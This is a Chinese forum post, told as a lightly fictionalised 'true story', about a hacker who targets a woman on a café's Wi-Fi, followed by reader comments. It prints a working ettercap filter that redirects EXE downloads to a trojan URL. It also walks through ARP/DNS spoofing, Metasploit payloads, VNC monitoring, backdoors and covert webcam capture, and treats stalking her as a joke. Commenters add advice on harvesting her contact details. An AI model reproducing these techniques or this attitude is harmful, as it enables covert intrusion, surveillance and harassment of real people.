姿势学习:屌丝黑客"追"妹记
第一章:咖啡馆的意外偶遇
注:此小说由真实案例改编(请原谅我以这种方式写技术文章) ,尽可能的还原了场景,有不足的地方或者技术不到位的地方请不要喷,尽可能的尊重下分享精神
众所周知黑客都是技术宅,在电脑强烈的辐射下,技术宅迟早有一日成为了大家心目中的“屌丝”,当然黑客没有女朋友那是理所当然的。
可是没女朋友就真的愿意当一个屌丝吗?当然不是,当屌丝我们也要当一个“幸福”的屌丝
黑客是神秘的,可以出现在地球的任意一个角落,当然火星也是可以去的,在黑客眼中,对他来说没有什么是隐私,因为根本没有这个词,
“没女朋友,可笑!”
“你不知道吗?只要是女的都是我的女朋友”
Only站起来严肃的看着我们说
Only是我的大学同学,也是一个非常出色的黑客,(黑客?他就是一个屌丝)
大家有时候坐在一起都会嘲笑他还没有找到女朋友,同学们都一个个的结婚了,甚至有的孩子都上小学了。
Only比较内向,平时都不怎么说话,大家一直开他玩笑,他也都习惯了,有时候就笑笑略过了,根本不会去计较什么!
大家看到Only这么严肃都被吓到了,整个咖啡厅都安静了,不一会隔壁桌的一个女孩发出了笑声,应该是在嘲笑他刚才说的那句话,Only有点脸红了,淡定的坐了下来
“你看!你吹牛把妹纸都逗笑了”
“刚那妹纸长得挺清秀的,你让她做你女朋友呗”
.......
.......
各种嘲讽的话语让Only终于忍不住了,Only打开了桌上的笔记本
看了下自己的IP地址:
然后再用nmap探测了下wifi内存活的主机
分析了下
192.168.169.1
192.168.169.254
应该是路由器
192.198.168.130是自己的主机
那剩下的应该是咖啡馆里其他用户的主机
“你在干什么”大家都很好奇
“不是你们说让那个女孩做我的女朋友吗?看着吧”
Only露出了邪恶的笑容
我转头看了下隔壁桌的妹子,妹子一个人在写什么东西(应该是这样的)
only估计是想搞下那个妹子的电脑,only扫描了咖啡厅所有的电脑只有这几个在线,所以其中一台肯定是妹子的主机
现在只要确定那一台是妹子的主机就可以了
最简单的方法就是去问?(显然不可能,妹子又不傻)
现在如果妹子在各种浏览什么网页,也许可以通过嗅探数据得到到底那一台是妹子的电脑,
0nly打开了wireshark进行了抓包嗅探,因为好多个主机有大量的数据包,所以分析数据是很费时费力的,Only一直在盯着妹子,好像在等待什么,突然他又露出了那诡异的笑容
“就是这个”
我们都凑过去看
“你怎么知道的”
“刚她登录邮箱发邮件了”
Only你可真是屌丝啊,I服了you!
确定了妹子的IP地址是 192.168.169.131
从嗅探中Only得知了妹子经常会用QQ邮箱发邮件和上微博,知道了妹子的QQ号和微博号
这还不够让Only满足,他打开nmap探测了下妹子的操作系统
居然用的XP,那可以用ettercap进行欺骗然后挂马了
这样就可以获得妹子的主机权限了
Only用metasploit(神器)生成了一个木马
Only打开了ettercap准备进行中间人攻击
首先新建一个规则
# replace rmccurdy with your website
# replace the url with what ever exe you like
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: [url=http://www.xxx.com/exe.exe]http://www.xxx.com/exe.exe[/url]
");
msg("redirect success\n");
}
}
最后编译下
然后进行欺骗
当妹纸不管下载什么东西的时候都会替换成我们的木马进行下载她运行后我们就可以获取权限了(当然木马首先得是免杀)
类似这样
所以当妹子下载什么的时候运行了我们的程序,就会中招
同时Only还用了另一种方法来进行攻击(怕妹子不上当)
因为前面得知妹子用的是XP所以Only生成了对IE浏览器攻击的网马
根据目标情况选择攻击模块
然后就用ettercap进行DNS欺骗
然后编辑我们的本地网页写上我们的网马代码
妹子访问任意www网页的这时候打开类似这样
不一会,妹子就中了Only设下的陷阱
都获取权限了那什么都能干了,我们看下妹子在干什么
开启VNC
Only就这样盯着看了半个小时,看妹子在干什么
缓过神后,0nly留了持久后门开了3389加上了远控木马(Only更喜欢这个)
然后产生了一个邪恶的想法(他想看妹子长什么样,因为妹子一直背坐着我们)
打开妹子的摄像头虽然获取了一张妹子的照片,但这远远不能满足Only
他要的是一个摄像头
Only满意的露出了笑容,但马上又板起脸来,好像想起了什么不开心的事
继续敲着键盘
开始编辑本地网页(我知道他要干什么了)
开启了DNS欺骗
妹子访问任意www网站的时候
同时Only又做了一个恶作剧
妹子的桌面上就出现了这样一个弹窗
妹子看到网页上有自己的照片再加上这样的弹窗,应该是被吓到了,四处张望了一下,立马关上电脑离开了咖啡厅
“妹子都被你吓跑了”
“啊”
Only这会沉浸在自己的“作品”中,有点得意,他听到自己把妹子吓跑了,又有一点失落,不过Only在妹子电脑上留了后门
“我们也走吧”
Only说,然后急匆匆的收拾了东西也跑了出去,
我们大家好像发现了点什么,就一起笑着也跟了出去
后面Only还会用什么方法继续追妹子呢?黑客的方法又怎么不同寻常呢?请继续关注<屌丝黑客“追”妹记>
TCV 5
关于作者
评论83次
妹子的背影不错,能xi引屌丝
不用那么早就篡改网页吓走妹纸的,应该多获取下QQ号 微博 微信 手机号等信息,然后直接过去找妹纸聊,老套路“你是不是叫xxx,手机号是不是xxx” 妹纸可能的回应是“你怎么知道的” 剩下的就自由发挥了
我晕,我看的以为是真的,因为在局域网,是可以135获得远程机器权限的!
登陆qq邮箱能嗅探到QQ号吗?HTTPS的?
难道妹纸在裸奔?这么容易搞到!
确实只能当成一篇黑客小说来看,和现实还有很大差距的,1.现实ARP欺骗很难成功的,现在基本电脑90%以上都有360,360自带ARP防火墙,2.Metasploit生成的木马并不免杀,就算编码N多次也是一样,除非想办法手动免杀吧,3.就算免杀成功了,成功反弹Shell之后Meterpreter下的很多工具也不能被成功执行(还要考虑绕过UAC等问题),例如开摄像头,亲测就未成功..4.玩好远控木马且免杀的(光凭这一点就能秒了90%菜鸟...)最后一个桌面弹出发送信息,这个倒是可以的,不过既然前面几条都未能实现,这个也就...
抱歉这个还真是一个实例改编的,木马是生成出来自己做了免杀,最后问妹子了,妹子运行是提示了,但是他下载的是他们同事发的重要文件,他急需打开看看,所以就没关,开摄像头,还真开开了, “现实ARP欺骗很难成功的” 这样说吧,去找个地方试试就知道了,就星巴克啊,茶楼啊,麦当劳啊,开启arp能嗅探一层 我还原环境的时候,我自己本机 window8xi统 装的360 用我笔记本嗅探我本机照样成功并且开启摄像头,
确实只能当成一篇黑客小说来看,和现实还有很大差距的, 1.现实ARP欺骗很难成功的,现在基本电脑90%以上都有360,360自带ARP防火墙, 2.Metasploit生成的木马并不免杀,就算编码N多次也是一样,除非想办法手动免杀吧, 3.就算免杀成功了,成功反弹Shell之后Meterpreter下的很多工具也不能被成功执行(还要考虑绕过UAC等问题),例如开摄像头,亲测就未成功.. 4.玩好远控木马且免杀的(光凭这一点就能秒了90%菜鸟...) 最后一个桌面弹出发送信息,这个倒是可以的,不过既然前面几条都未能实现,这个也就...
这有点不太像现实场景
等待屌丝黑客被打记
顶2楼,我觉得也只能是这样。
哈哈 然后结果往往不是想要的
看那only的手法 出神入分 服的不行了
后来only被妹子的黑产阔男友抓到后打一顿从此一蹶不振不碰电脑 GG
其实我更期待第二集....gif)
恶作剧,妹子怕这个吧
楼主应该表达的是,第一妹子不该用xp,第二咖啡厅不应该不划分VLAN或双向绑定,第三楼主没钱是diaosi哈哈 还有网马那个,如果妹子有大数字的话。。。金山也拦截网马,只有QQ不拦截
+1 还有楼主其实也想表达国民的安全意识还是很差,随便在那个肯德基啊 麦当劳啊 星巴克了 一钓一群这样的
是呀,确实很差。弱口令杀遍全国,大型机房或者企业甚至没有双绑导致ARP攻击,普通gov常年挂机,没人管理,教育部门数据库经常被搞...唉,都不重视安全。以前忍不住给大学提交过几次漏洞,要么人家拉黑掉,要么就不鸟我,或者是悄悄的修复了,连谢谢都不说。人与人的信任...xi望今年能重视国家安全以及教育政府企业等安全
我挺想看这文章后续的,故事写的不错
wireshark可以直接抓整个局域网的数据包吗?
嗯 可以 其实可以嗅探的工具很多 不过我感觉 wireshark还是比较给力
wireshark可以直接抓整个局域网的数据包吗?